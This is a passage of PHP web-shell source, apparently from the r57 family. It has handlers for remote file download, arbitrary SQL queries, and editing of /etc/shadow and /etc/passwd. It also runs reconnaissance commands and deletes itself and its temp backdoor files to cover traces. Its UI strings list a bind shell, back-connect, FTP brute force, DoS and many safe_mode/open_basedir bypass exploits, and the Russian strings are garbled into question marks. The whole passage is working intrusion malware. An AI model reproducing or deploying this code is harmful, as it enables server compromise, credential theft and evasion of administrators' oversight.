1558 break;
1559
1560 default:
1561
1562 return 0;
1563
1564 break;
1565
1566 }
1567
1568 }
1569
1570 }
1571
1572if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
1573
1574 {
1575
1576 if($file=moreread($_POST['d_name'])){ $filedump = $file; }
1577
1578 else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }
1579
1580 if(!empty($_POST['cmd']))
1581
1582 {
1583
1584 @ob_clean();
1585
1586 $filename = @basename($_POST['d_name']);
1587
1588 $content_encoding=$mime_type='';
1589
1590 compress($filename,$filedump,$_POST['compress']);
1591
1592 if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
1593
1594 header("Content-type: ".$mime_type);
1595
1596 header("Content-disposition: attachment; filename=\"".$filename."\";");
1597
1598 echo $filedump;
1599
1600 exit();
1601
1602 }
1603
1604 }
1605
1606if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }
1607
1608if (isset($_POST['cmd']) && $_POST['cmd']=="db_query")
1609
1610 {
1611
1612 echo $head;
1613
1614 $sql = new my_sql();
1615
1616 $sql->db = $_POST['db'];
1617
1618 $sql->host = $_POST['db_server'];
1619
1620 $sql->port = $_POST['db_port'];
1621
1622 $sql->user = $_POST['mysql_l'];
1623
1624 $sql->pass = $_POST['mysql_p'];
1625
1626 $sql->base = $_POST['mysql_db'];
1627
1628 $querys = @explode(';',$_POST['db_query']);
1629
1630 echo '<body bgcolor=#e4e0d8>';
1631
1632 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
1633
1634 else
1635
1636 {
1637
1638 if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
1639
1640 else
1641
1642 {
1643
1644 foreach($querys as $num=>$query)
1645
1646 {
1647
1648 if(strlen($query)>5)
1649
1650 {
1651
1652 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
1653
1654 switch($sql->query($query))
1655
1656 {
1657
1658 case '0':
1659
1660 echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
1661
1662 break;
1663
1664 case '1':
1665
1666 if($sql->get_result())
1667
1668 {
1669
1670 echo "<table width=100%>";
1671
1672 foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
1673
1674 $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", $sql->columns);
1675
1676 echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
1677
1678 for($i=0;$i<$sql->num_rows;$i++)
1679
1680 {
1681
1682 foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
1683
1684 $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
1685
1686 echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
1687
1688 }
1689
1690 echo "</table>";
1691
1692 }
1693
1694 break;
1695
1696 case '2':
1697
1698 $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
1699
1700 echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
1701
1702 break;
1703
1704 }
1705
1706 }
1707
1708 }
1709
1710 }
1711
1712 }
1713
1714 echo "<br><form name=form method=POST>";
1715
1716 echo in('hidden','db',0,$_POST['db']);
1717
1718 echo in('hidden','db_server',0,$_POST['db_server']);
1719
1720 echo in('hidden','db_port',0,$_POST['db_port']);
1721
1722 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
1723
1724 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
1725
1726 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
1727
1728 echo in('hidden','cmd',0,'db_query');
1729
1730 echo "<div align=center>";
1731
1732 echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
1733
1734 echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
1735
1736 echo "</form>";
1737
1738 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
1739
1740 }
1741
1742if(isset($_GET['12']))
1743
1744 {
1745
1746 @unlink(__FILE__);
1747
1748 }
1749
1750if(isset($_GET['11']))
1751
1752 {
1753
1754 @unlink($tempdir.'bdpl');
1755
1756 @unlink($tempdir.'back');
1757
1758 @unlink($tempdir.'bd');
1759
1760 @unlink($tempdir.'bd.c');
1761
1762 @unlink($tempdir.'dp');
1763
1764 @unlink($tempdir.'dpc');
1765
1766 @unlink($tempdir.'dpc.c');
1767
1768 @unlink($tempdir.'prxpl');
1769
1770 @unlink($tempdir.'grep.txt');
1771
1772 }
1773
1774if(isset($_GET['2']))
1775
1776{
1777
1778echo $head;
1779
1780function U_value($value)
1781
1782 {
1783
1784 if ($value == '') return '<i>no value</i>';
1785
1786 if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
1787
1788 if ($value === null) return 'NULL';
1789
1790 if (@is_object($value)) $value = (array) $value;
1791
1792 if (@is_array($value))
1793
1794 {
1795
1796 @ob_start();
1797
1798 print_r($value);
1799
1800 $value = @ob_get_contents();
1801
1802 @ob_end_clean();
1803
1804 }
1805
1806 return U_wordwrap((string) $value);
1807
1808 }
1809
1810function U_wordwrap($str)
1811
1812 {
1813
1814 $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
1815
1816 return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
1817
1818 }
1819
1820if (@function_exists('ini_get_all'))
1821
1822 {
1823
1824 $r = '';
1825
1826 echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
1827
1828 foreach (@ini_get_all() as $key=>$value)
1829
1830 {
1831
1832 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
1833
1834 }
1835
1836 echo $r;
1837
1838 echo '</table>';
1839
1840 }
1841
1842echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
1843
1844die();
1845
1846}
1847
1848if(isset($_GET['3']))
1849
1850 {
1851
1852 echo $head;
1853
1854 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
1855
1856 $cpuf = @file("cpuinfo");
1857
1858 if($cpuf)
1859
1860 {
1861
1862 $c = @sizeof($cpuf);
1863
1864 for($i=0;$i<$c;$i++)
1865
1866 {
1867
1868 $info = @explode(":",$cpuf[$i]);
1869
1870 if($info[1]==""){ $info[1]="---"; }
1871
1872 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1873
1874 }
1875
1876 echo $r;
1877
1878 }
1879
1880 else
1881
1882 {
1883
1884 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
1885
1886 }
1887
1888 echo '</table>';
1889
1890 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
1891
1892 die();
1893
1894 }
1895
1896if(isset($_GET['4']))
1897
1898 {
1899
1900 echo $head;
1901
1902 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
1903
1904 $memf = @file("meminfo");
1905
1906 if($memf)
1907
1908 {
1909
1910 $c = sizeof($memf);
1911
1912 for($i=0;$i<$c;$i++)
1913
1914 {
1915
1916 $info = explode(":",$memf[$i]);
1917
1918 if($info[1]==""){ $info[1]="---"; }
1919
1920 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1921
1922 }
1923
1924 echo $r;
1925
1926 }
1927
1928 else
1929
1930 {
1931
1932 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
1933
1934 }
1935
1936 echo '</table>';
1937
1938 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
1939
1940 die();
1941
1942 }
1943
1944
1945
1946if(isset($_GET['5']))
1947
1948 {$_POST['cmd'] = 'systeminfo';}
1949
1950if(isset($_GET['6']))
1951
1952 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
1953
1954if(isset($_GET['7']))
1955
1956 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
1957
1958if(isset($_GET['8']))
1959
1960 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
1961
1962if(isset($_GET['9']))
1963
1964 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
1965
1966if(isset($_GET['10']))
1967
1968 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
1969
1970if(isset($_GET['13']))
1971
1972 {$_POST['cmd']='cat /proc/cpuinfo';}
1973
1974if(isset($_GET['14']))
1975
1976 {$_POST['cmd']='cat /proc/version';}
1977
1978if(isset($_GET['15']))
1979
1980 {$_POST['cmd'] = 'free';}
1981
1982if(isset($_GET['16']))
1983
1984 {$_POST['cmd'] = 'dmesg(8)';}
1985
1986if(isset($_GET['17']))
1987
1988 {$_POST['cmd'] = 'vmstat';}
1989
1990if(isset($_GET['18']))
1991
1992 {$_POST['cmd'] = 'lspci';}
1993
1994if(isset($_GET['19']))
1995
1996 {$_POST['cmd'] = 'lsdev';}
1997
1998if(isset($_GET['20']))
1999
2000 {$_POST['cmd']='cat /proc/interrupts';}
2001
2002if(isset($_GET['21']))
2003
2004 {$_POST['cmd'] = 'cat /etc/*realise';}
2005
2006if(isset($_GET['22']))
2007
2008 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
2009
2010if(isset($_GET['23']))
2011
2012 {$_POST['cmd'] = 'lsattr -va';}
2013
2014if(isset($_GET['24']))
2015
2016 {$_POST['cmd'] = 'w';}
2017
2018if(isset($_GET['25']))
2019
2020 {$_POST['cmd'] = 'who';}
2021
2022if(isset($_GET['26']))
2023
2024 {$_POST['cmd'] = 'uptime';}
2025
2026if(isset($_GET['27']))
2027
2028 {$_POST['cmd'] = 'last -n 10';}
2029
2030if(isset($_GET['28']))
2031
2032 {$_POST['cmd'] = 'ps -aux';}
2033
2034if(isset($_GET['29']))
2035
2036 {$_POST['cmd'] = 'service --status-all';}
2037
2038if(isset($_GET['30']))
2039
2040 {$_POST['cmd'] = 'ifconfig';}
2041
2042if(isset($_GET['31']))
2043
2044 {$_POST['cmd'] = 'netstat -a';}
2045
2046if(isset($_GET['32']))
2047
2048 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
2049
2050if(isset($_GET['33']))
2051
2052 {$_POST['cmd'] = 'fdisk -l';}
2053
2054if(isset($_GET['34']))
2055
2056 {$_POST['cmd'] = 'df -h';}
2057
2058
2059
2060#if(isset($_GET['']))
2061
2062# {$_POST['cmd'] = '';}
2063
2064
2065
2066$lang=array(
2067
2068'ru_butt1' =>'?????????',
2069
2070'ru_butt2' =>'?????????',
2071
2072'ru_butt3' =>'???????',
2073
2074'ru_butt4' =>'?????????',
2075
2076'ru_butt5' =>'?????????',
2077
2078'ru_butt6' =>'???????',
2079
2080'ru_butt7' =>'???????',
2081
2082'ru_butt8' =>'?????????',
2083
2084'ru_butt9' =>'????',
2085
2086'ru_butt10'=>'?????????',
2087
2088'ru_butt11'=>'?????????????',
2089
2090'ru_butt12'=>'?????',
2091
2092'ru_butt13'=>'???????/???????',
2093
2094'ru_butt14'=>'???????',
2095
2096'ru_butt15'=>'?????????',
2097
2098'ru_text1' =>'??????????? ???????',
2099
2100'ru_text2' =>'?????????? ?????? ?? ???????',
2101
2102'ru_text3' =>'????????? ???????',
2103
2104'ru_text4' =>'??????? ??????????',
2105
2106'ru_text5' =>'???????? ?????? ?? ??????',
2107
2108'ru_text6' =>'????????? ????',
2109
2110'ru_text7' =>'??????',
2111
2112'ru_text8' =>'???????? ?????',
2113
2114'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
2115
2116'ru_text10'=>'??????? ????',
2117
2118'ru_text11'=>'?????? ??? ???????',
2119
2120'ru_text12'=>'back-connect',
2121
2122'ru_text13'=>'IP-?????',
2123
2124'ru_text14'=>'????',
2125
2126'ru_text15'=>'???????? ?????? ? ?????????? ???????',
2127
2128'ru_text16'=>'????????????',
2129
2130'ru_text17'=>'????????? ????',
2131
2132'ru_text18'=>'????????? ????',
2133
2134'ru_text19'=>'Exploits',
2135
2136'ru_text20'=>'????????????',
2137
2138'ru_text21'=>'????? ???',
2139
2140'ru_text22'=>'datapipe',
2141
2142'ru_text23'=>'????????? ????',
2143
2144'ru_text24'=>'????????? ????',
2145
2146'ru_text25'=>'????????? ????',
2147
2148'ru_text26'=>'????????????',
2149
2150'ru_text28'=>'?????? ? safe_mode',
2151
2152'ru_text29'=>'?????? ????????',
2153
2154'ru_text30'=>'???????? ?????',
2155
2156'ru_text31'=>'???? ?? ??????',
2157
2158'ru_text32'=>'?????????? PHP ????',
2159
2160'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL (PHP <= 4.4.2, 5.1.4)',
2161
2162'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
2163
2164'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
2165
2166'ru_text36'=>'???? . ???????',
2167
2168'ru_text37'=>'?????',
2169
2170'ru_text38'=>'??????',
2171
2172'ru_text39'=>'????',
2173
2174'ru_text40'=>'???? ??????? ???? ??????',
2175
2176'ru_text41'=>'????????? ? ?????',
2177
2178'ru_text42'=>'?????????????? ?????',
2179
2180'ru_text43'=>'????????????? ????',
2181
2182'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
2183
2184'ru_text45'=>'???? ????????',
2185
2186'ru_text46'=>'???????? phpinfo()',
2187
2188'ru_text47'=>'???????? ???????? php.ini',
2189
2190'ru_text48'=>'???????? ????????? ??????',
2191
2192'ru_text49'=>'???????? ??????? ? ???????',
2193
2194'ru_text50'=>'?????????? ? ??????????',
2195
2196'ru_text51'=>'?????????? ? ??????',
2197
2198'ru_text52'=>'????? ??? ??????',
2199
2200'ru_text53'=>'?????? ? ?????',
2201
2202'ru_text54'=>'????? ?????? ? ??????',
2203
2204'ru_text55'=>'?????? ? ??????',
2205
2206'ru_text56'=>'?????? ?? ???????',
2207
2208'ru_text57'=>'???????/??????? ????/??????????',
2209
2210'ru_text58'=>'???',
2211
2212'ru_text59'=>'????',
2213
2214'ru_text60'=>'??????????',
2215
2216'ru_text61'=>'???? ??????',
2217
2218'ru_text62'=>'?????????? ???????',
2219
2220'ru_text63'=>'???? ??????',
2221
2222'ru_text64'=>'?????????? ???????',
2223
2224'ru_text65'=>'???????',
2225
2226'ru_text66'=>'???????',
2227
2228'ru_text67'=>'Chown/Chgrp/Chmod',
2229
2230'ru_text68'=>'???????',
2231
2232'ru_text69'=>'????????1',
2233
2234'ru_text70'=>'????????2',
2235
2236'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
2237
2238'ru_text72'=>'????? ??? ??????',
2239
2240'ru_text73'=>'?????? ? ?????',
2241
2242'ru_text74'=>'?????? ? ??????',
2243
2244'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
2245
2246'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
2247
2248'ru_text80'=>'???',
2249
2250'ru_text81'=>'????',
2251
2252'ru_text82'=>'???? ??????',
2253
2254'ru_text83'=>'?????????? SQL ???????',
2255
2256'ru_text84'=>'SQL ??????',
2257
2258'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
2259
2260'ru_text86'=>'?????????? ????? ? ???????',
2261
2262'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
2263
2264'ru_text88'=>'??????:????',
2265
2266'ru_text89'=>'???? ?? ftp ???????',
2267
2268'ru_text90'=>'????? ????????',
2269
2270'ru_text91'=>'???????????? ?',
2271
2272'ru_text92'=>'??? ?????.',
2273
2274'ru_text93'=>'FTP',
2275
2276'ru_text94'=>'FTP-????????',
2277
2278'ru_text95'=>'?????? ?????????????',
2279
2280'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
2281
2282'ru_text97'=>'????????? ??????????: ',
2283
2284'ru_text98'=>'??????? ???????????: ',
2285
2286'ru_text99'=>'/etc/passwd',
2287
2288'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
2289
2290'ru_text101'=>'???????????? (user -> resu)',
2291
2292'ru_text102'=>'?????',
2293
2294'ru_text103'=>'???????? ??????',
2295
2296'ru_text104'=>'???????? ????? ?? ???????? ????',
2297
2298'ru_text105'=>'????',
2299
2300'ru_text106'=>'??',
2301
2302'ru_text107'=>'????',
2303
2304'ru_text108'=>'????? ??????',
2305
2306'ru_text109'=>'????????',
2307
2308'ru_text110'=>'??????????',
2309
2310'ru_text111'=>'SQL-?????? : ????',
2311
2312'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
2313
2314'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list() (PHP <= 5.1.2)',
2315
2316'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body() (PHP <= 5.1.2)',
2317
2318'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? [compress.zlib://] (PHP <= 4.4.2, 5.1.2)',
2319
2320'ru_text116'=>'?????????? ????',
2321
2322'ru_text117'=>'?',
2323
2324'ru_text118'=>'???? ??????????',
2325
2326'ru_text119'=>'?? ??????? ??????????? ????',
2327
2328'ru_text120'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? ini_restore() (PHP <= 4.4.4, 5.1.6) by NST',
2329
2330'ru_text121'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? fopen() (PHP v4.4.0 memory leak) by NST',
2331
2332'ru_text122'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? glob() (PHP <= 5.2.x)',
2333
2334'ru_text123'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.bzip ?????? [compress.bzip2://] (PHP <= 5.2.1)',
2335
2336'ru_text124'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? error_log(php://) (PHP <= 5.1.4, 4.4.2)',
2337
2338'ru_text125'=>'??????',
2339
2340'ru_text126'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ???????[NULL-byte] (PHP <= 5.2.0)',
2341
2342'ru_text127'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? readfile(php://) (PHP <= 5.2.1, 4.4.4)',
2343
2344'ru_text128'=>'???? ?????????/??????? ????? (touch)',
2345
2346'ru_text129'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ? fopen(srpath://) (PHP v5.2.0)',
2347
2348'ru_text130'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.zip ?????? [zip://] (PHP <= 5.2.1)',
2349
2350'ru_text131'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ??????????? ????? ? ?????????????? symlink() (PHP <= 5.2.1)',
2351
2352'ru_text132'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? symlink() (PHP <= 5.2.1)',
2353
2354'ru_text133'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ???????(TMPDIR) (PHP <= 5.2.4)',
2355
2356'ru_text134'=>'???????? ??? ??????',
2357
2358'ru_text135'=>'???????',
2359
2360'ru_text136'=>'???????? ?????????? ??????',
2361
2362'ru_text137'=>'????????',
2363
2364'ru_text138'=>'???????',
2365
2366'ru_text139'=>'????-??????',
2367
2368'ru_text140'=>'DoS',
2369
2370'ru_text141'=>'?????????! ???????? ???? ???-???????.',
2371
2372'ru_text142'=>'????????? ???????',
2373
2374'ru_text143'=>'Temp: ',
2375
2376'ru_text144'=>'Test bypass safe_mode with load file in mysqli',
2377
2378'ru_text145'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? realpath() (PHP <= 5.2.4)',
2379
2380'ru_text146'=>'MAX ???-?? ????????',
2381
2382'ru_text147'=>'',
2383
2384'ru_text148'=>'',
2385
2386'ru_text149'=>'',
2387
2388'ru_text150'=>'',
2389
2390'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
2391
2392'ru_err1'=>'??????! ?? ???? ????????? ???? ',
2393
2394'ru_err2'=>'??????! ?? ??????? ??????? ',
2395
2396'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
2397
2398'ru_err4'=>'?????? ??????????? ?? ftp ???????',
2399
2400'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
2401
2402'ru_err6'=>'??????! ?? ??????? ????????? ??????',
2403
2404'ru_err7'=>'?????? ??????????',
2405
2406/* --------------------------------------------------------------- */
2407
2408'eng_butt1' =>'Execute',
2409
2410'eng_butt2' =>'Upload',
2411
2412'eng_butt3' =>'Bind',
2413
2414'eng_butt4' =>'Connect',
2415
2416'eng_butt5' =>'Run',
2417
2418'eng_butt6' =>'Change',
2419
2420'eng_butt7' =>'Show',
2421
2422'eng_butt8' =>'Test',
2423
2424'eng_butt9' =>'Dump',
2425
2426'eng_butt10'=>'Save',
2427
2428'eng_butt11'=>'Edit file',
2429
2430'eng_butt12'=>'Find',
2431
2432'eng_butt13'=>'Create/Delete',
2433
2434'eng_butt14'=>'Download',
2435
2436'eng_butt15'=>'Send',
2437
2438'eng_text1' =>'Executed command',
2439
2440'eng_text2' =>'Execute command on server',
2441
2442'eng_text3' =>'Run command',
2443
2444'eng_text4' =>'Work directory',
2445
2446'eng_text5' =>'Upload files on server',
2447
2448'eng_text6' =>'Local file',
2449
2450'eng_text7' =>'Aliases',
2451
2452'eng_text8' =>'Select alias',
2453
2454'eng_text9' =>'Bind port to /bin/bash',
2455
2456'eng_text10'=>'Port',
2457
2458'eng_text11'=>'Password for access',
2459
2460'eng_text12'=>'back-connect',
2461
2462'eng_text13'=>'IP',
2463
2464'eng_text14'=>'Port',
2465
2466'eng_text15'=>'Upload files from remote server',
2467
2468'eng_text16'=>'With',
2469
2470'eng_text17'=>'Remote file',
2471
2472'eng_text18'=>'Local file',
2473
2474'eng_text19'=>'Exploits',
2475
2476'eng_text20'=>'Use',
2477
2478'eng_text21'=>' New name',
2479
2480'eng_text22'=>'datapipe',
2481
2482'eng_text23'=>'Local port',
2483
2484'eng_text24'=>'Remote host',
2485
2486'eng_text25'=>'Remote port',
2487
2488'eng_text26'=>'Use',
2489
2490'eng_text28'=>'Work in safe_mode',
2491
2492'eng_text29'=>'ACCESS DENIED',
2493
2494'eng_text30'=>'Cat file',
2495
2496'eng_text31'=>'File not found',
2497
2498'eng_text32'=>'Eval PHP code',
2499
2500'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
2501
2502'eng_text34'=>'Test bypass safe_mode with include function',
2503
2504'eng_text35'=>'Test bypass safe_mode with load file in mysql',
2505
2506'eng_text36'=>'Database . Table',
2507
2508'eng_text37'=>'Login',
2509
2510'eng_text38'=>'Password',
2511
2512'eng_text39'=>'Database',
2513
2514'eng_text40'=>'Dump database table',
2515
2516'eng_text41'=>'Save dump in file',
2517
2518'eng_text42'=>'Edit files',
2519
2520'eng_text43'=>'File for edit',
2521
2522'eng_text44'=>'Can\'t edit file! Only read access!',
2523
2524'eng_text45'=>'File saved',
2525
2526'eng_text46'=>'Show phpinfo()',
2527
2528'eng_text47'=>'Show variables from php.ini',
2529
2530'eng_text48'=>'Delete temp files',
2531
2532'eng_text49'=>'Delete script from server',
2533
2534'eng_text50'=>'View cpu info',
2535
2536'eng_text51'=>'View memory info',
2537
2538'eng_text52'=>'Find text',
2539
2540'eng_text53'=>'In dirs',
2541
2542'eng_text54'=>'Find text in files',
2543
2544'eng_text55'=>'Only in files',
2545
2546'eng_text56'=>'Nothing :(',
2547
2548'eng_text57'=>'Create/Delete File/Dir',
2549
2550'eng_text58'=>'name',
2551
2552'eng_text59'=>'file',
2553
2554'eng_text60'=>'dir',
2555
2556'eng_text61'=>'File created',
2557
2558'eng_text62'=>'Dir created',
2559
2560'eng_text63'=>'File deleted',
2561
2562'eng_text64'=>'Dir deleted',
2563
2564'eng_text65'=>'Create',
2565
2566'eng_text66'=>'Delete',
2567
2568'eng_text67'=>'Chown/Chgrp/Chmod',
2569
2570'eng_text68'=>'Command',
2571
2572'eng_text69'=>'param1',
2573
2574'eng_text70'=>'param2',
2575
2576'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
2577
2578'eng_text72'=>'Text for find',
2579
2580'eng_text73'=>'Find in folder',
2581
2582'eng_text74'=>'Find in files',
2583
2584'eng_text75'=>'* you can use regexp',
2585
2586'eng_text76'=>'Search text in files via find',
2587
2588'eng_text80'=>'Type',
2589
2590'eng_text81'=>'Net',
2591
2592'eng_text82'=>'Databases',
2593
2594'eng_text83'=>'Run SQL query',
2595
2596'eng_text84'=>'SQL query',
2597
2598'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
2599
2600'eng_text86'=>'Download files from server',
2601
2602'eng_text87'=>'Download files from remote ftp-server',
2603
2604'eng_text88'=>'server:port',
2605
2606'eng_text89'=>'File on ftp',
2607
2608'eng_text90'=>'Transfer mode',
2609
2610'eng_text91'=>'Archivation',
2611
2612'eng_text92'=>'without arch.',
2613
2614'eng_text93'=>'FTP',
2615
2616'eng_text94'=>'FTP-bruteforce',
2617
2618'eng_text95'=>'Users list',
2619
2620'eng_text96'=>'Can\'t get users list',
2621
2622'eng_text97'=>'checked: ',
2623
2624'eng_text98'=>'success: ',
2625
2626'eng_text99'=>'/etc/passwd',
2627
2628'eng_text100'=>'Send file to remote ftp server',
2629
2630'eng_text101'=>'Use reverse (user -> resu)',
2631
2632'eng_text102'=>'Mail',
2633
2634'eng_text103'=>'Send email',
2635
2636'eng_text104'=>'Send file to email',
2637
2638'eng_text105'=>'To',
2639
2640'eng_text106'=>'From',
2641
2642'eng_text107'=>'Subj',
2643
2644'eng_text108'=>'Mail',
2645
2646'eng_text109'=>'Hide',
2647
2648'eng_text110'=>'Show',
2649
2650'eng_text111'=>'SQL-Server : Port',
2651
2652'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
2653
2654'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
2655
2656'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
2657
2658'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
2659
2660'eng_text116'=>'Copy from',
2661
2662'eng_text117'=>'to',
2663
2664'eng_text118'=>'File copied',
2665
2666'eng_text119'=>'Cant copy file',
2667
2668'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
2669
2670'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
2671
2672'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)',
2673
2674'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
2675
2676'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
2677
2678'eng_text125'=>'Data',
2679
2680'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
2681
